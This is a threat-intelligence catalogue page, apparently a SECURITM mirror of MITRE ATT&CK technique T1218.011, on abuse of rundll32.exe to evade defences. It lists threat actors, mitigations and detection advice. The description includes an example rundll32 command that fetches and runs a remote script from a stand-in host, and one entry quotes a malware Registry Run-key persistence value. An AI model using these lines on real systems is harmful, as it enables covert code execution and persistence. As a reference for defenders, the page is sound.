Cервис управления информационной безопасностью
Cервис управления информационной безопасностью
Вход Регистрация
MITRE ATT&CK - Техника Rundll32
Каталоги
MITRE ATT&CK
БДУ ФСТЭК
Новая БДУ ФСТЭК
EN
Риски
Каталоги
MITRE ATT&CK
Техника
Rundll32
Куда я попал?
SECURITM это SGRC система, ? автоматизирующая процессы в службах информационной безопасности. SECURITM помогает построить и управлять ИСПДн, КИИ, ГИС, СМИБ/СУИБ, банковскими системами защиты.
А еще SECURITM это место для обмена опытом и наработками для служб безопасности.
Подробнее
Наш канал

System Binary Proxy Execution:  Rundll32

ID Название
.001 CHM-файл
.002 Панель управления
.003 Установщик профилей диспетчера подключений (CMSTP)
.004 Утилита InstallUtil
.005 Утилита mshta
.007 Утилита msiexec
.008 Утилита odbcconf
.009 Утилиты Regsvcs и Regasm
.010 Утилита Regsvr32
.011 Rundll32
.012 Verclsid
.013 Mavinject
.014 MMC

Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads (ex: rundll32.exe {DLLname, DLLfunction}). Rundll32.exe can also be used to execute Control Panel Item files (.cpl) through the undocumented shell32.dll functions Control_RunDLL and Control_RunDLLAsUser. Double-clicking a .cpl file also causes rundll32.exe to execute. (Citation: Trend Micro CPL) Rundll32 can also be used to execute scripts such as JavaScript. This can be done using a syntax similar to this: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https[:]//www[.]example[.]com/malicious.sct")" This behavior has been seen used by malware such as Poweliks. (Citation: This is Security Command Line Confusion) Adversaries may also attempt to obscure malicious code from analysis by abusing the manner in which rundll32.exe loads DLL function names. As part of Windows compatibility support for various character sets, rundll32.exe will first check for wide/Unicode then ANSI character-supported functions before loading the specified function (e.g., given the command rundll32.exe ExampleDLL.dll, ExampleFunction, rundll32.exe would first attempt to execute ExampleFunctionW, or failing that ExampleFunctionA, before loading ExampleFunction). Adversaries may therefore obscure malicious code by creating multiple identical exported function names and appending W and/or A to harmless ones.(Citation: Attackify Rundll32.exe Obscurity)(Citation: Github NoRunDll) DLL functions can also be exported and executed by an ordinal number (ex: rundll32.exe file.dll,#1). Additionally, adversaries may use Masquerading techniques (such as changing DLL file names, file extensions, or function names) to further conceal execution of a malicious payload.(Citation: rundll32.exe defense evasion)

ID: T1218.011
Относится к технике:  T1218
Тактика(-и): Defense Evasion
Платформы: Windows
Источники данных: Command: Command Execution, File: File Metadata, Module: Module Load, Process: Process Creation
Версия: 2.0
Дата создания: 23 Jan 2020
Последнее изменение: 19 Apr 2022

Примеры процедур
Название Описание
InvisiMole

InvisiMole has used rundll32.exe for execution.(Citation: ESET InvisiMole June 2020)
PUNCHBUGGY

PUNCHBUGGY can load a DLL using Rundll32.(Citation: FireEye Know Your Enemy FIN8 Aug 2016)
BoomBox

BoomBox can use RunDLL32 for execution.(Citation: MSTIC Nobelium Toolset May 2021)
ADVSTORESHELL

ADVSTORESHELL has used rundll32.exe in a Registry value to establish persistence.(Citation: Bitdefender APT28 Dec 2015)
Briba

Briba uses rundll32 within Registry Run Keys / Startup Folder entries to execute malicious DLLs.(Citation: Symantec Briba May 2012)
MegaCortex

MegaCortex has used rundll32.exe to load a DLL for file encryption.(Citation: IBM MegaCortex)
GreyEnergy

GreyEnergy uses PsExec locally in order to execute rundll32.exe at the highest privileges (NTAUTHORITY\SYSTEM).(Citation: ESET GreyEnergy Oct 2018)
StreamEx

StreamEx uses rundll32 to call an exported function.(Citation: Cylance Shell Crew Feb 2017)
Emissary

Variants of Emissary have used rundll32.exe in Registry values added to establish persistence.(Citation: Emissary Trojan Feb 2016)
PowerDuke

PowerDuke uses rundll32.exe to load.(Citation: Volexity PowerDuke November 2016)
Mosquito

Mosquito's launcher uses rundll32.exe in a Registry Key value to start the main backdoor capability.(Citation: ESET Turla Mosquito Jan 2018)
Prikormka

Prikormka uses rundll32.exe to load its DLL.(Citation: ESET Operation Groundbait)
Egregor

Egregor has used rundll32 during execution.(Citation: Cybereason Egregor Nov 2020)
Gamaredon Group

Gamaredon Group malware has used rundll32 to launch additional malicious components.(Citation: ESET Gamaredon June 2020)
PolyglotDuke

PolyglotDuke can be executed using rundll32.exe.(Citation: ESET Dukes October 2019)
Elise

After copying itself to a DLL file, a variant of Elise calls the DLL file using rundll32.exe.(Citation: Lotus Blossom Jun 2015)
APT19

APT19 configured its payload to inject into the rundll32.exe.(Citation: FireEye APT19)
Attor

Attor's installer plugin can schedule rundll32.exe to load the dispatcher.(Citation: ESET Attor Oct 2019)
FunnyDream

FunnyDream can use `rundll32` for execution of its components.(Citation: Bitdefender FunnyDream Campaign November 2020)
Kimsuky

Kimsuky has used `rundll32.exe` to execute malicious scripts and malware on a victim's network.(Citation: Talos Kimsuky Nov 2021)
EnvyScout

EnvyScout has the ability to proxy execution of malicious files with Rundll32.(Citation: MSTIC Nobelium Toolset May 2021)
Backdoor.Oldrea

Backdoor.Oldrea can use rundll32 for execution on compromised hosts.(Citation: Gigamon Berserk Bear October 2021)

During C0015, the threat actors loaded DLLs via `rundll32` using the `svchost` process.(Citation: DFIR Conti Bazar Nov 2021)
Carbanak

Carbanak installs VNC server software that executes through rundll32.(Citation: Kaspersky Carbanak)
APT3

APT3 has a tool that can run DLLs.(Citation: FireEye Clandestine Fox)
Magic Hound

Magic Hound has used rundll32.exe to execute MiniDump from comsvcs.dll when dumping LSASS memory.(Citation: DFIR Report APT35 ProxyShell March 2022)
TA551

TA551 has used rundll32.exe to load malicious DLLs.(Citation: Unit 42 TA551 Jan 2021)
DDKONG

DDKONG uses Rundll32 to ensure only a single instance of itself is running at once.(Citation: Rancor Unit42 June 2018)
gh0st RAT

A gh0st RAT variant has used rundll32 for execution.(Citation: Arbor Musical Chairs Feb 2018)
SDBbot

SDBbot has used rundll32.exe to execute DLLs.(Citation: Korean FSI TA505 2020)
Blue Mockingbird

Blue Mockingbird has executed custom-compiled XMRIG miner DLLs using rundll32.exe.(Citation: RedCanary Mockingbird May 2020)
Winnti for Windows

The Winnti for Windows installer loads a DLL using rundll32.(Citation: Microsoft Winnti Jan 2017)(Citation: Novetta Winnti April 2015)
CozyCar

The CozyCar dropper copies the system file rundll32.exe to the install location for the malware, then uses the copy of rundll32.exe to load and execute the main CozyCar component.(Citation: F-Secure CozyDuke)
APT32

APT32 malware has used rundll32.exe to execute an initial infection process.(Citation: Cybereason Cobalt Kitty 2017)
Heyoka Backdoor

Heyoka Backdoor can use rundll32.exe to gain execution.(Citation: SentinelOne Aoqin Dragon June 2022)
Mongall

Mongall can use `rundll32.exe` for execution.(Citation: SentinelOne Aoqin Dragon June 2022)
SUNBURST

SUNBURST used Rundll32 to execute payloads.(Citation: Microsoft Deep Dive Solorigate January 2021)

Bumblebee

Bumblebee has used `rundll32` for execution of the loader component.(Citation: Proofpoint Bumblebee April 2022)(Citation: Symantec Bumblebee June 2022)
Lazarus Group

Lazarus Group has used rundll32 to execute malicious payloads on a compromised host.(Citation: McAfee Lazarus Jul 2020)(Citation: ESET Lazarus Jun 2020)(Citation: ESET Twitter Ida Pro Nov 2021)
TA505

TA505 has leveraged rundll32.exe to execute malicious DLLs.(Citation: Cybereason TA505 April 2019)(Citation: Deep Instinct TA505 Apr 2019)
Bad Rabbit

Bad Rabbit has used rundll32 to launch a malicious DLL as C:Windowsinfpub.dat.(Citation: Secure List Bad Rabbit)
PcShare

PcShare has used `rundll32.exe` for execution.(Citation: Bitdefender FunnyDream Campaign November 2020)
CopyKittens

CopyKittens uses rundll32 to load various tools on victims, including a lateral movement tool named Vminst, Cobalt Strike, and shellcode.(Citation: ClearSky Wilted Tulip July 2017)
APT41

APT41 has used rundll32.exe to execute a loader.(Citation: Crowdstrike GTR2020 Mar 2020)
FlawedAmmyy

FlawedAmmyy has used `rundll32` for execution.(Citation: Korean FSI TA505 2020)
UNC2452

UNC2452 used Rundll32 to execute payloads.(Citation: Microsoft - Customer Guidance on Recent Nation-State Cyber Attacks)(Citation: Microsoft Deep Dive Solorigate January 2021)
Sandworm Team

Sandworm Team used a backdoor which could execute a supplied DLL using rundll32.exe.(Citation: ESET Telebots July 2017)

APT28

APT28 executed CHOPSTICK by using rundll32 commands such as rundll32.exe “C:\Windows\twain_64.dll”. APT28 also executed a .dll for a first stage dropper using rundll32.exe. An APT28 loader Trojan saved a batch script that uses rundll32 to execute a DLL payload.(Citation: Crowdstrike DNC June 2016)(Citation: Bitdefender APT28 Dec 2015)(Citation: Palo Alto Sofacy 06-2018)(Citation: Unit 42 Playbook Dec 2017)(Citation: ESET Zebrocy May 2019)(Citation: Cybersecurity Advisory GRU Brute Force Campaign July 2021)
Bisonal

Bisonal has used rundll32.exe to execute as part of the Registry Run key it adds: HKEY_CURRENT_USER \Software\Microsoft\Windows\CurrentVersion\Run\”vert” = “rundll32.exe c:\windows\temp\pvcu.dll , Qszdez”.(Citation: Unit 42 Bisonal July 2018)
HAFNIUM

HAFNIUM has used rundll32 to load malicious DLLs.(Citation: Volexity Exchange Marauder March 2021)
USBferry

USBferry can execute rundll32.exe in memory to avoid detection.(Citation: TrendMicro Tropic Trooper May 2020)

Pteranodon

Pteranodon executes functions using rundll32.exe.(Citation: Palo Alto Gamaredon Feb 2017)
NativeZone

NativeZone has used rundll32 to execute a malicious DLL.(Citation: SentinelOne NobleBaron June 2021)
Sakula

Sakula calls cmd.exe to run various DLL files via rundll32.(Citation: Dell Sakula)
ZxShell

ZxShell has used rundll32.exe to execute other DLLs and named pipes.(Citation: Talos ZxShell Oct 2014)

ServHelper

ServHelper contains a module for downloading and executing DLLs that leverages rundll32.exe.(Citation: Deep Instinct TA505 Apr 2019)
NOKKI

NOKKI has used rundll32 for execution.(Citation: Unit 42 NOKKI Sept 2018)
FatDuke

FatDuke can execute via rundll32.(Citation: ESET Dukes October 2019)
RTM

RTM runs its core DLL file using rundll32.exe.(Citation: ESET RTM Feb 2017)(Citation: Unit42 Redaman January 2019)
Kwampirs

Kwampirs uses rundll32.exe in a Registry value added to establish persistence.(Citation: Symantec Orangeworm April 2018)
KONNI

KONNI has used Rundll32 to execute its loader for privilege escalation purposes.(Citation: Medium KONNI Jan 2020)(Citation: Malwarebytes Konni Aug 2021)
FELIXROOT

FELIXROOT uses Rundll32 for executing the dropper program.(Citation: FireEye FELIXROOT July 2018)(Citation: ESET GreyEnergy Oct 2018)

During Operation Spalax, the threat actors used `rundll32.exe` to execute malicious installers.(Citation: ESET Operation Spalax Jan 2021)
APT29

APT29 has used Rundll32.exe to execute payloads.(Citation: Microsoft - Customer Guidance on Recent Nation-State Cyber Attacks)(Citation: Microsoft Deep Dive Solorigate January 2021)(Citation: FireEye APT29 Nov 2018)
Sibot

Sibot has executed downloaded DLLs with rundll32.exe.(Citation: MSTIC NOBELIUM Mar 2021)
Comnie

Comnie uses Rundll32 to load a malicious DLL.(Citation: Palo Alto Comnie)
EVILNUM

EVILNUM can execute commands and scripts through rundll32.(Citation: Prevailion EvilNum May 2020)

APT38

APT38 has used rundll32.exe to execute binaries, scripts, and Control Panel Item files and to execute code via proxy to avoid triggering security tools.(Citation: CISA AA20-239A BeagleBoyz August 2020)
BLINDINGCAN

BLINDINGCAN has used Rundll32 to load a malicious DLL.(Citation: US-CERT BLINDINGCAN Aug 2020)
CORESHELL

CORESHELL is installed via execution of rundll32 with an export named "init" or "InitW."(Citation: Microsoft SIR Vol 19)
Matryoshka

Matryoshka uses rundll32.exe in a Registry Run key value for execution as part of its persistence mechanism.(Citation: CopyKittens Nov 2015)
Flame

Rundll32.exe is used as a way of executing Flame at the command-line.(Citation: Crysys Skywiper)
LazyScripter

LazyScripter has used `rundll32.exe` to execute Koadic stagers.(Citation: MalwareBytes LazyScripter Feb 2021)

NotPetya

NotPetya uses rundll32.exe to install itself on remote systems when accessed via PsExec or wmic.(Citation: Talos Nyetya June 2017)
Cobalt Strike

Cobalt Strike can use `rundll32.exe` to load DLL from the command line.(Citation: Cobalt Strike Manual 4.3 November 2020)(Citation: DFIR Conti Bazar Nov 2021)
JHUHUGIT

JHUHUGIT is executed using rundll32.exe.(Citation: F-Secure Sofacy 2015)(Citation: Talos Seduploader Oct 2017)
HermeticWizard

HermeticWizard has the ability to create a new process using `rundll32`.(Citation: ESET Hermetic Wizard March 2022)
Ragnar Locker

Ragnar Locker has used rundll32.exe to execute components of VirtualBox.(Citation: Sophos Ragnar May 2020)
MuddyWater

MuddyWater has used malware that leveraged rundll32.exe in a Registry Run key to execute a .dll.(Citation: Securelist MuddyWater Oct 2018)
QakBot

QakBot can use Rundll32.exe to enable C2 communication.(Citation: Crowdstrike Qakbot October 2020)(Citation: Red Canary Qbot)(Citation: Cyberint Qakbot May 2021)(Citation: ATT QakBot April 2021)
Squirrelwaffle

Squirrelwaffle has been executed using `rundll32.exe`.(Citation: ZScaler Squirrelwaffle Sep 2021)(Citation: Netskope Squirrelwaffle Oct 2021)
Koadic

Koadic can use Rundll32 to execute additional payloads.(Citation: Github Koadic)

Контрмеры
Контрмера Описание
Exploit Protection

Use capabilities to detect and block conditions that may lead to or be indicative of a software exploit occurring.

Обнаружение

Use process monitoring to monitor the execution and arguments of rundll32.exe. Compare recent invocations of rundll32.exe with prior history of known good arguments and loaded DLLs to determine anomalous and potentially adversarial activity. Command arguments used with the rundll32.exe invocation may also be useful in determining the origin and purpose of the DLL being loaded. Analyzing DLL exports and comparing to runtime arguments may be useful in uncovering obfuscated function calls.

Ссылки

  1. Merces, F. (2014). CPL Malware Malicious Control Panel Items. Retrieved November 1, 2017.
  2. gtworek. (2019, December 17). NoRunDll. Retrieved August 23, 2021.
  3. B. Ancel. (2014, August 20). Poweliks – Command Line Confusion. Retrieved March 5, 2018.
  4. Attackify. (n.d.). Rundll32.exe Obscurity. Retrieved August 23, 2021.
  5. Ariel silver. (2022, February 1). Defense Evasion Techniques. Retrieved April 8, 2022.
  6. Slowik, J. (2021, October). THE BAFFLING BERSERK BEAR: A DECADE’S ACTIVITY TARGETING CRITICAL INFRASTRUCTURE. Retrieved December 6, 2021.
  7. Faou, M., Tartare, M., Dupuy, T. (2019, October). OPERATION GHOST. Retrieved September 23, 2020.
  8. Financial Security Institute. (2020, February 28). Profiling of TA505 Threat Group That Continues to Attack the Financial Sector. Retrieved July 14, 2022.
  9. NSA, CISA, FBI, NCSC. (2021, July). Russian GRU Conducting Global Brute Force Campaign to Compromise Enterprise and Cloud Environments. Retrieved July 26, 2021.
  10. ESET Research. (2019, May 22). A journey to Zebrocy land. Retrieved June 20, 2019.
  11. Unit 42. (2017, December 15). Unit 42 Playbook Viewer. Retrieved December 20, 2017.
  12. Lee, B., Falcone, R. (2018, June 06). Sofacy Group’s Parallel Attacks. Retrieved June 18, 2018.
  13. Bitdefender. (2015, December). APT28 Under the Scope. Retrieved February 23, 2017.
  14. Alperovitch, D.. (2016, June 15). Bears in the Midst: Intrusion into the Democratic National Committee. Retrieved August 3, 2016.
  15. US-CERT. (2020, August 19). MAR-10295134-1.v1 – North Korean Remote Access Trojan: BLINDINGCAN. Retrieved August 19, 2020.
  16. F-Secure. (2015, September 8). Sofacy Recycles Carberp and Metasploit Code. Retrieved August 3, 2016.
  17. Cherepanov, A. (2018, October). GREYENERGY A successor to BlackEnergy. Retrieved November 15, 2018.
  18. Boutin, J. (2020, June 11). Gamaredon group grows its game. Retrieved June 16, 2020.
  19. DFIR Report. (2021, November 29). CONTInuing the Bazar Ransomware Story. Retrieved September 29, 2022.
  20. MSTIC, CDOC, 365 Defender Research Team. (2021, January 20). Deep dive into the Solorigate second-stage activation: From SUNBURST to TEARDROP and Raindrop . Retrieved January 22, 2021.
  21. MSRC. (2020, December 13). Customer Guidance on Recent Nation-State Cyber Attacks. Retrieved December 30, 2020.
  22. M. Porolli. (2021, January 21). Operation Spalax: Targeted malware attacks in Colombia. Retrieved September 16, 2022.
  23. Strategic Cyber LLC. (2020, November 5). Cobalt Strike: Advanced Threat Tactics for Penetration Testers. Retrieved April 13, 2021.
  24. Mercer, W., et al. (2017, October 22). "Cyber Conflict" Decoy Document Used in Real Cyber Conflict. Retrieved November 2, 2018.
  25. Hromcova, Z. (2019, October). AT COMMANDS, TOR-BASED COMMUNICATIONS: MEET ATTOR, A FANTASY CREATURE AND ALSO A SPY PLATFORM. Retrieved May 6, 2020.
  26. Ash, B., et al. (2018, June 26). RANCOR: Targeted Attacks in South East Asia Using PLAINTEE and DDKONG Malware Families. Retrieved July 2, 2018.
  27. Lambert, T. (2020, May 7). Introducing Blue Mockingbird. Retrieved May 26, 2020.
  28. Crowdstrike. (2020, March 2). 2020 Global Threat Report. Retrieved December 11, 2020.
  29. Guerrero-Saade, J. (2021, June 1). NobleBaron | New Poisoned Installers Could Be Used In Supply Chain Attacks. Retrieved August 4, 2021.
  30. Grunzweig, J. (2018, January 31). Comnie Continues to Target Organizations in East Asia. Retrieved June 7, 2018.
  31. Falcone, R. and Miller-Osborn, J. (2016, February 3). Emissary Trojan Changelog: Did Operation Lotus Blossom Cause It to Evolve?. Retrieved February 15, 2016.
  32. Mamedov, O. Sinitsyn, F. Ivanov, A.. (2017, October 24). Bad Rabbit ransomware. Retrieved January 28, 2021.
  33. Hayashi, K., Ray, V. (2018, July 31). Bisonal Malware Used in Attacks Against Russia and South Korea. Retrieved August 7, 2018.
  34. Gruzweig, J. et al. (2021, March 2). Operation Exchange Marauder: Active Exploitation of Multiple Zero-Day Microsoft Exchange Vulnerabilities. Retrieved March 3, 2021.
  35. Chen, J.. (2020, May 12). Tropic Trooper’s Back: USBferry Attack Targets Air gapped Environments. Retrieved May 20, 2020.
  36. DHS/CISA. (2020, August 26). FASTCash 2.0: North Korea's BeagleBoyz Robbing Banks. Retrieved September 29, 2021.
  37. MSTIC. (2021, May 28). Breaking down NOBELIUM’s latest early-stage toolset. Retrieved August 4, 2021.
  38. Novetta Threat Research Group. (2015, April 7). Winnti Analysis. Retrieved February 8, 2017.
  39. Cap, P., et al. (2017, January 25). Detecting threat actors in recent German industrial attacks with Windows Defender ATP. Retrieved February 8, 2017.
  40. Allievi, A., et al. (2014, October 28). Threat Spotlight: Group 72, Opening the ZxShell. Retrieved September 24, 2019.
  41. Cylance SPEAR Team. (2017, February 9). Shell Crew Variants Continue to Fly Under Big AV’s Radar. Retrieved February 15, 2017.
  42. Symantec Security Response Attack Investigation Team. (2018, April 23). New Orangeworm attack group targets the healthcare sector in the U.S., Europe, and Asia. Retrieved May 8, 2018.
  43. Anthe, C. et al. (2015, October 19). Microsoft Security Intelligence Report Volume 19. Retrieved December 23, 2015.
  44. Sabo, S. (2018, February 15). Musical Chairs Playing Tetris. Retrieved February 19, 2018.
  45. Cherepanov, Anton. (2019, November 10). ESETresearch discovered a trojanized IDA Pro installer. Retrieved March 2, 2022.
  46. Cashman, M. (2020, July 29). Operation North Star Campaign. Retrieved December 20, 2021.
  47. Breitenbacher, D and Osis, K. (2020, June 17). OPERATION IN(TER)CEPTION: Targeted Attacks Against European Aerospace and Military Companies. Retrieved December 20, 2021.
  48. Vrabie, V. (2020, November). Dissecting a Chinese APT Targeting South Eastern Asian Government Institutions. Retrieved September 19, 2022.
  49. Cherepanov, A.. (2017, July 4). Analysis of TeleBots’ cunning backdoor . Retrieved June 11, 2020.
  50. Kasza, A. and Reichel, D. (2017, February 27). The Gamaredon Group Toolset Evolution. Retrieved March 1, 2017.
  51. Ladley, F. (2012, May 15). Backdoor.Briba. Retrieved February 21, 2018.
  52. Del Fierro, C. Kessem, L.. (2020, January 8). From Mega to Giga: Cross-Version Comparison of Top MegaCortex Modifications. Retrieved February 15, 2021.
  53. Vilkomir-Preisman, S. (2019, April 2). New ServHelper Variant Employs Excel 4.0 Macro to Drop Signed Payload. Retrieved May 28, 2019.
  54. Adair, S.. (2016, November 9). PowerDuke: Widespread Post-Election Spear Phishing Campaigns Targeting Think Tanks and NGOs. Retrieved January 11, 2017.
  55. Kaspersky Lab's Global Research & Analysis Team. (2018, October 10). MuddyWater expands operations. Retrieved November 2, 2018.
  56. Elovitz, S. & Ahl, I. (2016, August 18). Know Your Enemy: New Financially-Motivated & Spear-Phishing Group. Retrieved February 26, 2018.
  57. Cherepanov, A.. (2016, May 17). Operation Groundbait: Analysis of a surveillance toolkit. Retrieved May 18, 2016.
  58. Minerva Labs LTD and ClearSky Cyber Security. (2015, November 23). CopyKittens Attack Group. Retrieved September 11, 2017.
  59. Morrow, D. (2021, April 15). The rise of QakBot. Retrieved September 27, 2021.
  60. Cyberint. (2021, May 25). Qakbot Banking Trojan. Retrieved September 27, 2021.
  61. Rainey, K. (n.d.). Qbot. Retrieved September 27, 2021.
  62. CS. (2020, October 7). Duck Hunting with Falcon Complete: A Fowl Banking Trojan Evolves, Part 2. Retrieved September 27, 2021.
  63. Kaspersky Lab's Global Research and Analysis Team. (2015, February). CARBANAK APT THE GREAT BANK ROBBERY. Retrieved August 23, 2018.
  64. Duncan, B. (2021, January 7). TA551: Email Attack Campaign Switches from Valak to IcedID. Retrieved March 17, 2021.
  65. SophosLabs. (2020, May 21). Ragnar Locker ransomware deploys virtual machine to dodge security. Retrieved June 29, 2020.
  66. Rochberger, L. (2020, November 26). Cybereason vs. Egregor Ransomware. Retrieved December 30, 2020.
  67. DFIR Report. (2022, March 21). APT35 Automates Initial Access Using ProxyShell. Retrieved May 25, 2022.
  68. Dunwoody, M., et al. (2018, November 19). Not So Cozy: An Uncomfortable Examination of a Suspected APT29 Phishing Campaign. Retrieved November 27, 2018.
  69. Nafisi, R., Lelli, A. (2021, March 4). GoldMax, GoldFinder, and Sibot: Analyzing NOBELIUM’s layered persistence. Retrieved March 8, 2021.
  70. Adamitis, D. (2020, May 6). Phantom in the Command Shell. Retrieved December 22, 2021.
  71. sKyWIper Analysis Team. (2012, May 31). sKyWIper (a.k.a. Flame a.k.a. Flamer): A complex malware for targeted attacks. Retrieved September 6, 2018.
  72. Jazi, H. (2021, February). LazyScripter: From Empire to double RAT. Retrieved November 24, 2021.
  73. Chiu, A. (2016, June 27). New Ransomware Variant "Nyetya" Compromises Systems Worldwide. Retrieved March 26, 2019.
  74. Grunzweig, J., Lee, B. (2018, September 27). New KONNI Malware attacking Eurasia and Southeast Asia. Retrieved November 5, 2018.
  75. Threat Intelligence Team. (2021, August 23). New variant of Konni malware used in campaign targetting Russia. Retrieved January 5, 2022.
  76. Karmi, D. (2020, January 4). A Look Into Konni 2019 Campaign. Retrieved April 28, 2020.
  77. Palazolo, G. (2021, October 7). SquirrelWaffle: New Malware Loader Delivering Cobalt Strike and QakBot. Retrieved August 9, 2022.
  78. Kumar, A., Stone-Gross, Brett. (2021, September 28). Squirrelwaffle: New Loader Delivering Cobalt Strike. Retrieved August 9, 2022.
  79. Merriman, K. and Trouerbach, P. (2022, April 28). This isn't Optimus Prime's Bumblebee but it's Still Transforming. Retrieved August 22, 2022.
  80. Kamble, V. (2022, June 28). Bumblebee: New Loader Rapidly Assuming Central Position in Cyber-crime Ecosystem. Retrieved August 24, 2022.
  81. Duncan, B., Harbison, M. (2019, January 23). Russian Language Malspam Pushing Redaman Banking Malware. Retrieved June 16, 2020.
  82. Faou, M. and Boutin, J. (2017, February). Read The Manual: A Guide to the RTM Banking Trojan. Retrieved March 9, 2017.
  83. Falcone, R., et al.. (2015, June 16). Operation Lotus Blossom. Retrieved February 15, 2016.
  84. ClearSky Cyber Security and Trend Micro. (2017, July). Operation Wilted Tulip: Exposing a cyber espionage apparatus. Retrieved August 21, 2017.
  85. Dell SecureWorks Counter Threat Unit Threat Intelligence. (2015, July 30). Sakula Malware Family. Retrieved January 26, 2016.
  86. Magius, J., et al. (2017, July 19). Koadic. Retrieved June 18, 2018.
  87. Chen, X., Scott, M., Caselden, D.. (2014, April 26). New Zero-Day Exploit targeting Internet Explorer Versions 9 through 11 Identified in Targeted Attacks. Retrieved January 14, 2016.
  88. F-Secure Labs. (2015, April 22). CozyDuke: Malware Analysis. Retrieved December 10, 2015.
  89. Chen, Joey. (2022, June 9). Aoqin Dragon | Newly-Discovered Chinese-linked APT Has Been Quietly Spying On Organizations For 10 Years. Retrieved July 14, 2022.
  90. ESET. (2022, March 1). IsaacWiper and HermeticWizard: New wiper and worm targetingUkraine. Retrieved April 10, 2022.
  91. Hromcova, Z. and Cherpanov, A. (2020, June). INVISIMOLE: THE HIDDEN PART OF THE STORY. Retrieved July 16, 2020.
  92. ESET, et al. (2018, January). Diplomats in Eastern Europe bitten by a Turla mosquito. Retrieved July 3, 2018.
  93. Ahl, I. (2017, June 06). Privileges and Credentials: Phished at the Request of Counsel. Retrieved May 17, 2018.
  94. An, J and Malhotra, A. (2021, November 10). North Korean attackers use malicious blogs to deliver malware to high-profile South Korean targets. Retrieved December 29, 2021.
  95. Salem, E. (2019, April 25). Threat Actor TA505 Targets Financial Enterprises Using LOLBins and a New Backdoor Malware. Retrieved May 28, 2019.
  96. Patil, S. (2018, June 26). Microsoft Office Vulnerabilities Used to Distribute FELIXROOT Backdoor in Recent Campaign. Retrieved July 31, 2018.
  97. Dahan, A. (2017). Operation Cobalt Kitty. Retrieved December 27, 2018.
Навигация

Связанные риски

Ничего не найдено

Каталоги

Мы используем cookie-файлы, чтобы получить статистику, которая помогает нам улучшить сервис для вас с целью персонализации сервисов и предложений. Вы может прочитать подробнее о cookie-файлах или изменить настройки браузера. Продолжая пользоваться сайтом, вы даёте согласие на использование ваших cookie-файлов и соглашаетесь с Политикой обработки персональных данных.